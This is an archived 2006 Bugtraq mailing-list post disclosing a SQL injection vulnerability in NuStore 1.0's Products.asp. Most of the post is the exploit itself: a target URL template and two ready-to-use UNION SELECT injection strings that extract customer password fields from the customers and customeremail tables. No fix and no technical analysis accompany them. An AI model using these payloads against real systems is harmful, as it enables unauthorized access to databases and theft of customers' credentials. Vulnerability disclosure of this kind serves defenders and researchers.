[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061111132458.3548.qmail@securityfocus.com>
Date: 11 Nov 2006 13:24:58 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
*******************************************************************************
# Title : NuStore 1.0 (Products.asp) Remote SQL Injection Vulnerability
# Author : ajann
From:Filistin,Lubnan,IraQ,Turkey
*******************************************************************************
###http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=[ SQL ]
Example:
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
//Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
Powered by blists - more mailing lists